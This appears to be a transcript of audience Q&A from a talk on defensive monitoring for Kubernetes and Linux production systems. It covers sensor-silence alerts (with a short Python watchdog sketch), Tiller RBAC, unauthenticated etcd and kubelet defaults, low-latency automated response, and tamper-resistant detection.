That's another very good point I should have made: a signal stopping is a huge signal in and of itself. When you're really getting serious about designing these systems, what you also want to do is tie the monitoring into the transaction path, so that attackers can't turn it off and still have a functional system. If you can, implement it so that if you don't see any events from a node within a certain period of time, you turn off its switch port: if there are no events, it shouldn't be on the network, because it's not doing anything. You can experiment with this stuff so that turning off a monitoring agent becomes the biggest red flag possible.
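A minimal sketch of that silence-as-a-signal watchdog. All names are illustrative, and the quarantine action is just a callback; in practice it might disable a switch port or cordon the node through your orchestrator:

```python
import time

HEARTBEAT_TIMEOUT = 60.0  # seconds of silence before we react (tunable)

class SilenceWatchdog:
    """Track the last event time per node; any node that goes quiet for
    longer than the timeout is treated as suspect and quarantined."""

    def __init__(self, timeout=HEARTBEAT_TIMEOUT, on_silent=print):
        self.timeout = timeout
        self.on_silent = on_silent  # called with the silent node's name
        self.last_seen = {}

    def record_event(self, node, now=None):
        # Any telemetry at all from the sensor counts as a heartbeat.
        self.last_seen[node] = time.monotonic() if now is None else now

    def check(self, now=None):
        # Return nodes that have gone silent, firing the callback once each.
        now = time.monotonic() if now is None else now
        silent = [n for n, t in self.last_seen.items() if now - t > self.timeout]
        for node in silent:
            self.on_silent(node)
            del self.last_seen[node]  # don't re-alert until it reappears
        return silent
```

Run `check()` on a timer, and a killed monitoring agent turns into an alert within one timeout interval instead of a blind spot.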
Actually, let's change from comments to pro tips. Anyone else have any good pro tips on doing things like this? I might put another dude on the spot about how to do this at large scale. Yeah, I'm looking at you. Oh, sorry, I'm looking at Mike. It's Linux only, yeah. Yeah, we're focused completely on production environments. Is that in the back?

Yeah, that's a good point. Definitely apply RBAC to Helm, or to Tiller, so that it's isolated in what it can do even given its lack of authentication. Also, and this is where I'm definitely at the border of my knowledge, if you're using something like Calico and have that workload separation built into the network layer, it's going to be impossible for you to hit a Tiller running in a different namespace. But without that, the network is flat: even if Tiller is in a separate Kubernetes namespace, you can still reach it over the network and still resolve it through kube-dns, no matter what Kubernetes namespace you're in. And, to repeat the question, there's actually a lot of great work being done with Tiller to do delegated authentication and authorization using the user's credentials. There's pretty exciting stuff happening with SPIFFE right now, building workload-identity-aware authentication into the fabric of your cluster. I haven't seen how far they've gotten with delegation, but that's sort of the next step. I think by Kubernetes 2.0 we're going to have a lot of this, and that's the secure version.

Honestly, I don't really think a lot about that, so I don't want to give advice I haven't thought through. I know people have done cool stuff with Vault. I was at Square when we open sourced Keywhiz, and ironically, I was like: wait, we're open sourcing the thing where we put all our secrets? Am I the only one who thinks this is a bad idea?
We're telling people where our secrets are and how it works. But it turns out you actually do get a lot of benefit out of it, and it makes the system stronger; that just took a perspective shift on my side. With etcd, the thing I've seen in my experimentation with different cluster setup tools is that you don't always have authentication on the etcd nodes. So even though everything else is authenticated, you can just access the keys directly. There are a lot of these areas where it'd be great to make sure there's authentication on the kubelet, which it supports, but for some reason it's not configured by a given tool. The advice I usually give people is that there are a lot of knobs that, surprisingly, aren't turned on by default in different tools. So if you don't want to go through all this stuff, a cloud provider or a commercial distribution of Kubernetes tends to be your best option.

Yeah, sure. My philosophy on these things is that I don't like hard blocks, because they have a high potential of breaking things. What I like is a low-latency response. When something is out of line but you have a low-latency response, you have a lot more options. And you don't want to do pure bulk data analysis, because that increases the latency significantly. But look at how a lot of people do things like automated trading: you do a lot of data analysis offline to build the models that run in real time. I think that's a good model for defending your infrastructure, because you're penalized similarly: if you make the wrong decision fast, that's bad, and if you miss something, that's also bad. You need data analysis to inform the actions you're going to take in real time. So what I focus on, and what we focus on at Capsule8, is a low-latency automated response to security incidents, and that kind of architecture.
But I don't want to go too much into the product plug, so I'll just talk about the open source component, and that doesn't do any of that today. Yeah, it's a read-only event stream; it uses probes. You could call it the analog of eventually consistent, because blocking tends to be really disastrous in production environments. But you have to put the system under pretty significant load before you start dropping events with perf and the ring buffers.

In a Kubernetes environment, yeah, I recommend a DaemonSet; it's one command to do it. The Capsule8 sensor is a single binary, and we provide a Dockerfile for it, so it's pretty easy to throw it in a DaemonSet and you're good. Then there's a gRPC API to communicate with it, to gather all the telemetry you're interested in and provide filtering options that are all evaluated in the kernel. And it's all dynamic subscriptions. So you can have one subscription that monitors something across the board at one performance profile, and when something interesting happens, you can increase the subscription: oh wow, that container is interesting, I want to see everything it does, and I'll pay the performance penalty to log every system call for that container in particular. And so on. Yes, sir?

You're doing a lot of similar things with OSSEC, but I kind of like using cloud APIs. One of the things I like about this architecture of putting detection logic in AWS Lambda is that the attack surface is minimal, right? Because, all right, let's put our attacker hats on: wherever that detection logic is, I want to know what the detections are, and I want to modify them, right? And wherever all the logs are, I want to know that and modify them too.
So if you make that more difficult, you're winning. That's why I like Lambda: I just write my logic in there and let Amazon scale it. And if Amazon's infrastructure is compromised, I'm pretty much hosed anyway, but that's one piece I have to worry less about. And it's not really that complicated, so I didn't see a benefit to adapting it. Because if you're using a cloud provider, you're already depending on the security of their environment, plus your credentials, your IAM isolation model, and other things. And this is an easy way where, if you also care about separation of concerns among staff, you can do things like say: all right, cool, for various reasons we won't let this team look at the raw data, but we'll let them write the detections. They can see the alerts, but they can't see the raw data, because there might be PII in there or something like that. You can implement a lot of that much more easily with those tools. Also, they're new and shiny. Cool, does anyone want me to repeat that? Were you able to hear them? Cool, thanks.

Yeah, so right now we're just looking at things like health checks: making sure the sensor is still running and using Kubernetes health monitoring to identify when it has been shut down. But when you think about tamper-proofing, or making tamper-resistant software that runs in an environment that could be compromised, it's a bit challenging. I spent several years doing it, so I have my ways that I like. What I find works well is that an attacker can't be everywhere at once, and they also can't go back in time. So you figure out that terrain and ask: okay, what is really hard for them?
If I'm going to modify the software, I'm going to need to reverse engineer it, I need to know how to do it, I'm going to need to do things that generate signal before I pull it off, and I'll need some preparation. Those are pressure points where you can add difficulty. On that side, Go binaries are incredibly easy to reverse engineer; they love having symbols for everything. I think modifying a Go binary to tell it not to do a thing is probably about 20 minutes with ptrace, and with slightly more advanced tools, it's like five. So we're not there yet, as an industry either, at that level.

But I think one of the benefits of the cloud and more nimble infrastructure is that being able to just tear things down and restart, and to build some evasiveness, some deception, into your infrastructure, makes life really hard for an attacker inside it. They can't just download a piece of open source software and figure out how it works and where the knobs are, because when they say, oh, you're running this piece of software, I know how to disable that, it's: okay, cool, the binary image is totally different, so try to find that piece in my environment; it's a little different. There's a lot you can do here. One of the things I realized about continuous build pipelines is that they let you do a whole lot of cool stuff. When you have a continuous delivery pipeline, a continuous security pipeline, you don't have to set it, forget it, and get hacked. You can do a lot of fun stuff. I don't want to give away all of my ideas just yet, so stay tuned. Any more? Okay, cool. All right, I'm going to let you all go. If there's any questions, come up. Thank you for staying, thank you for coming.